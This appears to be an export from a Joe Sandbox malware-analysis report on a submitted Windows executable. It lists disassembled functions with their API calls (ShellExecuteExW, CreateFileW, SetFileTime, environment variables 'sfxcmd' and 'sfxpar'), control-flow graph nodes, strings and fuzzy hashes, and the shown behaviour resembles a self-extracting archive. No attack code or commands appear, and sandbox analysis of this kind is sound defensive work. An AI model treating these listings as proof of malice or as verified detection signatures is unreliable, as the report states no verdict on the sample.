                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                  • API String ID: 566448164-801612888
                                                                                                  • Opcode ID: 9b7a3f8e351c6cc45d079fd5b1bd08c410af3934a9c2f81d34633838b1c4ea06
                                                                                                  • Instruction ID: 976f27ca469ff1b18ffb954589c9979d163bfca05b8d19d535dc0c96eef280e9
                                                                                                  • Opcode Fuzzy Hash: 9b7a3f8e351c6cc45d079fd5b1bd08c410af3934a9c2f81d34633838b1c4ea06
                                                                                                  • Instruction Fuzzy Hash: 6F32DF72A04218EFDF24EFA8C841BEA77B9FF84700F40495AF945972C1E7B19985CB50
                                                                                                  Function 0091D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0091B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                    • Part of subcall function 0091B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                    • Part of subcall function 0091B568: IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                    • Part of subcall function 0091B568: TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                    • Part of subcall function 0091B568: DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  • GetDlgItem.USER32(00000068,0095FCB8), ref: 0091D4E8
                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,0091AF07,00000001,?,?,0091B7B9,0093506C,0095FCB8,0095FCB8,00001000,00000000,00000000), ref: 0091D510
                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0091D51B
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,009335F4), ref: 0091D529
                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D53F
                                                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0091D559
                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D59D
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0091D5AB
                                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D5BA
                                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D5E1
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,009343F4), ref: 0091D5F0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                  • String ID: \
                                                                                                  • API String ID: 3569833718-2967466578
                                                                                                  • Opcode ID: 8769c787d51f5737c2d09592493eeab2e84f2f291791635f32146fa7a3b65a59
                                                                                                  • Instruction ID: 9badbfb785a59765e29a1f9829e2c8c63fe36954f3eba05fbcb1c72e2907c676
                                                                                                  • Opcode Fuzzy Hash: 8769c787d51f5737c2d09592493eeab2e84f2f291791635f32146fa7a3b65a59
                                                                                                  • Instruction Fuzzy Hash: 7531C171659346ABD301DF209C4AFAB7FACEB82704F00450CF951961A0DBB49A089B76
                                                                                                  Function 0091D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 836 91d78f-91d7a7 call 91ec50 839 91d9e8-91d9f0 836->839 840 91d7ad-91d7b9 call 923e13 836->840 840->839 843 91d7bf-91d7e7 call 91fff0 840->843 846 91d7f1-91d7ff 843->846 847 91d7e9 843->847 848 91d801-91d804 846->848 849 91d812-91d818 846->849 847->846 850 91d808-91d80e 848->850 851 91d85b-91d85e 849->851 852 91d810 850->852 853 91d837-91d844 850->853 851->850 854 91d860-91d866 851->854 855 91d822-91d82c 852->855 856 91d9c0-91d9c2 853->856 857 91d84a-91d84e 853->857 858 91d868-91d86b 854->858 859 91d86d-91d86f 854->859 862 91d81a-91d820 855->862 863 91d82e 855->863 864 91d9c6 856->864 857->864 865 91d854-91d859 857->865 858->859 861 91d882-91d898 call 90b92d 858->861 860 91d871-91d878 859->860 859->861 860->861 866 91d87a 860->866 871 91d8b1-91d8bc call 90a231 861->871 872 91d89a-91d8a7 call 911fbb 861->872 862->855 868 91d830-91d833 862->868 863->853 870 91d9cf 864->870 865->851 866->861 868->853 873 91d9d6-91d9d8 870->873 882 91d8d9-91d8e6 ShellExecuteExW 871->882 883 91d8be-91d8d5 call 90b6c4 871->883 872->871 881 91d8a9 872->881 876 91d9e7 873->876 877 91d9da-91d9dc 873->877 876->839 877->876 878 91d9de-91d9e1 ShowWindow 877->878 878->876 881->871 882->876 884 91d8ec-91d8f9 882->884 883->882 886 91d8fb-91d902 884->886 887 91d90c-91d90e 884->887 886->887 889 91d904-91d90a 886->889 890 91d910-91d919 887->890 891 91d925-91d944 call 91dc3b 887->891 889->887 892 91d97b-91d987 CloseHandle 889->892 890->891 899 91d91b-91d923 ShowWindow 890->899 891->892 905 91d946-91d94e 891->905 893 91d989-91d996 call 911fbb 892->893 894 91d998-91d9a6 892->894 893->870 893->894 894->873 898 91d9a8-91d9aa 894->898 898->873 902 91d9ac-91d9b2 898->902 899->891 902->873 904 91d9b4-91d9be 902->904 904->873 905->892 906 91d950-91d961 GetExitCodeProcess 905->906 906->892 907 91d963-91d96d 906->907 908 91d974 907->908 909 91d96f 907->909 908->892 909->908
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 0091D7AE
                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0091D8DE
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0091D91D
                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0091D959
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0091D97F
                                                                                                  • ShowWindow.USER32(?,00000001), ref: 0091D9E1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                  • String ID: .exe$.inf
                                                                                                  • API String ID: 36480843-3750412487
                                                                                                  • Opcode ID: d1f802a08c317611399af3aa0313641b38c887314b98d71a3169ec24a875c837
                                                                                                  • Instruction ID: a89a0f84e4753ec8aad4f3d51366bc85f425af98a9a08efca9713c4c34d65dcd
                                                                                                  • Opcode Fuzzy Hash: d1f802a08c317611399af3aa0313641b38c887314b98d71a3169ec24a875c837
                                                                                                  • Instruction Fuzzy Hash: 7051F67160A388AADB309F24D840BEBBBE8AF82744F04485DF5C1971A1D775CAC4DB52
                                                                                                  Function 0092A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 910 92a95b-92a974 911 92a976-92a986 call 92ef4c 910->911 912 92a98a-92a98f 910->912 911->912 919 92a988 911->919 914 92a991-92a999 912->914 915 92a99c-92a9c0 MultiByteToWideChar 912->915 914->915 917 92ab53-92ab66 call 91fbbc 915->917 918 92a9c6-92a9d2 915->918 920 92aa26 918->920 921 92a9d4-92a9e5 918->921 919->912 923 92aa28-92aa2a 920->923 924 92a9e7-92a9f6 call 932010 921->924 925 92aa04-92aa15 call 928e06 921->925 927 92aa30-92aa43 MultiByteToWideChar 923->927 928 92ab48 923->928 924->928 938 92a9fc-92aa02 924->938 925->928 935 92aa1b 925->935 927->928 932 92aa49-92aa5b call 92af6c 927->932 933 92ab4a-92ab51 call 92abc3 928->933 940 92aa60-92aa64 932->940 933->917 939 92aa21-92aa24 935->939 938->939 939->923 940->928 942 92aa6a-92aa71 940->942 943 92aa73-92aa78 942->943 944 92aaab-92aab7 942->944 943->933 947 92aa7e-92aa80 943->947 945 92ab03 944->945 946 92aab9-92aaca 944->946 950 92ab05-92ab07 945->950 948 92aae5-92aaf6 call 928e06 946->948 949 92aacc-92aadb call 932010 946->949 947->928 951 92aa86-92aaa0 call 92af6c 947->951 954 92ab41-92ab47 call 92abc3 948->954 964 92aaf8 948->964 949->954 962 92aadd-92aae3 949->962 950->954 955 92ab09-92ab22 call 92af6c 950->955 951->933 966 92aaa6 951->966 954->928 955->954 967 92ab24-92ab2b 955->967 968 92aafe-92ab01 962->968 964->968 966->928 969 92ab67-92ab6d 967->969 970 92ab2d-92ab2e 967->970 968->950 971 92ab2f-92ab3f WideCharToMultiByte 969->971 970->971 971->954 972 92ab6f-92ab76 call 92abc3 971->972 972->933
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00925695,00925695,?,?,?,0092ABAC,00000001,00000001,2DE85006), ref: 0092A9B5
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0092ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0092AA3B
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0092AB35
                                                                                                  • __freea.LIBCMT ref: 0092AB42
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  • __freea.LIBCMT ref: 0092AB4B
                                                                                                  • __freea.LIBCMT ref: 0092AB70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1414292761-0
                                                                                                  • Opcode ID: 7da6a313feb345b697c645395a00a621c16b68ff6e7403c62b9f69181f6e2fc3
                                                                                                  • Instruction ID: 2a978731cd0ef2b2d827cbbf88c1e1315f030aa3153611cef28a9b20e92db0db
                                                                                                  • Opcode Fuzzy Hash: 7da6a313feb345b697c645395a00a621c16b68ff6e7403c62b9f69181f6e2fc3
                                                                                                  • Instruction Fuzzy Hash: 6951F173A10226AFDB258F64EC51FBBB7AAEF80710F154628FC04E6158EB34DC44D692
                                                                                                  Function 00923B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 975 923b72-923b7c 976 923bee-923bf1 975->976 977 923bf3 976->977 978 923b7e-923b8c 976->978 979 923bf5-923bf9 977->979 980 923b95-923bb1 LoadLibraryExW 978->980 981 923b8e-923b91 978->981 982 923bb3-923bbc GetLastError 980->982 983 923bfa-923c00 980->983 984 923b93 981->984 985 923c09-923c0b 981->985 987 923be6-923be9 982->987 988 923bbe-923bd3 call 926088 982->988 983->985 989 923c02-923c03 FreeLibrary 983->989 986 923beb 984->986 985->979 986->976 987->986 988->987 992 923bd5-923be4 LoadLibraryExW 988->992 989->985 992->983 992->987
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00923C35,?,?,00962088,00000000,?,00923D60,00000004,InitializeCriticalSectionEx,00936394,InitializeCriticalSectionEx,00000000), ref: 00923C03
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3664257935-2084034818
                                                                                                  • Opcode ID: d9e1bf9325cdeb4086dafcdb6d6a6bc633ac55e55558ebc964a71c027e2b0150
                                                                                                  • Instruction ID: ddc1d8a9a733868ae5b435381b79140ffc722244bc1ac465c35d4166668caa4f
                                                                                                  • Opcode Fuzzy Hash: d9e1bf9325cdeb4086dafcdb6d6a6bc633ac55e55558ebc964a71c027e2b0150
                                                                                                  • Instruction Fuzzy Hash: 6711CA35A49631BBCB218F68BC4176A37A89F01770F258110FD55FB198D778EF009AD1
                                                                                                  Function 0091AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0091081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
                                                                                                    • Part of subcall function 0091081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
                                                                                                  • OleInitialize.OLE32(00000000), ref: 0091AC2F
                                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0091AC66
                                                                                                  • SHGetMalloc.SHELL32(00948438), ref: 0091AC70
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                  • String ID: riched20.dll$3Ro
                                                                                                  • API String ID: 3498096277-3613677438
                                                                                                  • Opcode ID: 942ed46ea7ce149ae9cecdc88d42fe34d9804d368a72d80e933309f26c88736a
                                                                                                  • Instruction ID: e01639f5e6ec674300c331a9f8d871dd21ee639f909d91f82e06d7e40077b2eb
                                                                                                  • Opcode Fuzzy Hash: 942ed46ea7ce149ae9cecdc88d42fe34d9804d368a72d80e933309f26c88736a
                                                                                                  • Instruction Fuzzy Hash: 27F01DB1D0420AABCB10AFA9D849AEFFFFCEFC4704F00415AE815E2251DBB456459FA1
                                                                                                  Function 009098E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 997 9098e0-909901 call 91ec50 1000 909903-909906 997->1000 1001 90990c 997->1001 1000->1001 1002 909908-90990a 1000->1002 1003 90990e-90991f 1001->1003 1002->1003 1004 909921 1003->1004 1005 909927-909931 1003->1005 1004->1005 1006 909933 1005->1006 1007 909936-909943 call 906edb 1005->1007 1006->1007 1010 909945 1007->1010 1011 90994b-90996a CreateFileW 1007->1011 1010->1011 1012 9099bb-9099bf 1011->1012 1013 90996c-90998e GetLastError call 90bb03 1011->1013 1015 9099c3-9099c6 1012->1015 1017 9099c8-9099cd 1013->1017 1022 909990-9099b3 CreateFileW GetLastError 1013->1022 1015->1017 1018 9099d9-9099de 1015->1018 1017->1018 1019 9099cf 1017->1019 1020 9099e0-9099e3 1018->1020 1021 9099ff-909a10 1018->1021 1019->1018 1020->1021 1023 9099e5-9099f9 SetFileTime 1020->1023 1024 909a12-909a2a call 910602 1021->1024 1025 909a2e-909a39 1021->1025 1022->1015 1026 9099b5-9099b9 1022->1026 1023->1021 1024->1025 1026->1015
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00907760,?,00000005,?,00000011), ref: 0090995F
                                                                                                  • GetLastError.KERNEL32(?,?,00907760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0090996C
                                                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00907760,?,00000005,?), ref: 009099A2
                                                                                                  • GetLastError.KERNEL32(?,?,00907760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009099AA
                                                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00907760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009099F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CreateErrorLast$Time
                                                                                                  • String ID:
                                                                                                  • API String ID: 1999340476-0
                                                                                                  • Opcode ID: cedbd73b33238dc6ea0d2764e0896b8b3caa7f425f9dc66cb2bf9f6aa0b988fd
                                                                                                  • Instruction ID: 3a820a61571512244a992c3825c19b0a0db97af64cb82b96826deef06888465e
                                                                                                  • Opcode Fuzzy Hash: cedbd73b33238dc6ea0d2764e0896b8b3caa7f425f9dc66cb2bf9f6aa0b988fd
                                                                                                  • Instruction Fuzzy Hash: 4F3102305887456FE7309F24CD46BDABB98BB45320F200B19F9F1961D2D7B4A994CB91
                                                                                                  Function 0091B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1056 91b568-91b581 PeekMessageW 1057 91b583-91b597 GetMessageW 1056->1057 1058 91b5bc-91b5be 1056->1058 1059 91b599-91b5a6 IsDialogMessageW 1057->1059 1060 91b5a8-91b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                                                                  APIs
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                  • IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                  • TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1266772231-0
                                                                                                  • Opcode ID: 85fd62d1c29dc9d0ed9c8ef11e8ed286601caf00c3c8e2fe1d8073335148553a
                                                                                                  • Instruction ID: cba2c41608778290a592665de68c394313d08552b6941a6dbb510d671c8bf907
                                                                                                  • Opcode Fuzzy Hash: 85fd62d1c29dc9d0ed9c8ef11e8ed286601caf00c3c8e2fe1d8073335148553a
                                                                                                  • Instruction Fuzzy Hash: E7F0D071E1511ABB8B209BE5DD4CDDB7FBDEE053917008419F505D2050EB74D649DBB0
                                                                                                  Function 0091ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1061 91abab-91abca GetClassNameW 1062 91abf2-91abf4 1061->1062 1063 91abcc-91abe1 call 911fbb 1061->1063 1065 91abf6-91abf9 SHAutoComplete 1062->1065 1066 91abff-91ac01 1062->1066 1068 91abf1 1063->1068 1069 91abe3-91abef FindWindowExW 1063->1069 1065->1066 1068->1062 1069->1068
                                                                                                  APIs
                                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 0091ABC2
                                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0091ABF9
                                                                                                    • Part of subcall function 00911FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0090C116,00000000,.exe,?,?,00000800,?,?,?,00918E3C), ref: 00911FD1
                                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0091ABE9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                  • String ID: EDIT
                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                  • Opcode ID: 00b37d5634de9714654698d353753020c2a87fed641cab90667ff96f06eabbc6
                                                                                                  • Instruction ID: 94b392cbd324ab073e9849b0fb504271e3687703b89f4cd3ce62a83aa63bdd26
                                                                                                  • Opcode Fuzzy Hash: 00b37d5634de9714654698d353753020c2a87fed641cab90667ff96f06eabbc6
                                                                                                  • Instruction Fuzzy Hash: 0EF08232B4522C76EB3056249C09FDB76AC9B46B40F494015FA05A21C0D7A0EE8585B6
                                                                                                  Function 0091DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1070 91dbde-91dc09 call 91ec50 SetEnvironmentVariableW call 910371 1074 91dc0e-91dc12 1070->1074 1075 91dc14-91dc18 1074->1075 1076 91dc36-91dc38 1074->1076 1077 91dc21-91dc28 call 91048d 1075->1077 1080 91dc1a-91dc20 1077->1080 1081 91dc2a-91dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                                  APIs
                                                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0091DBF4
                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0091DC30
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
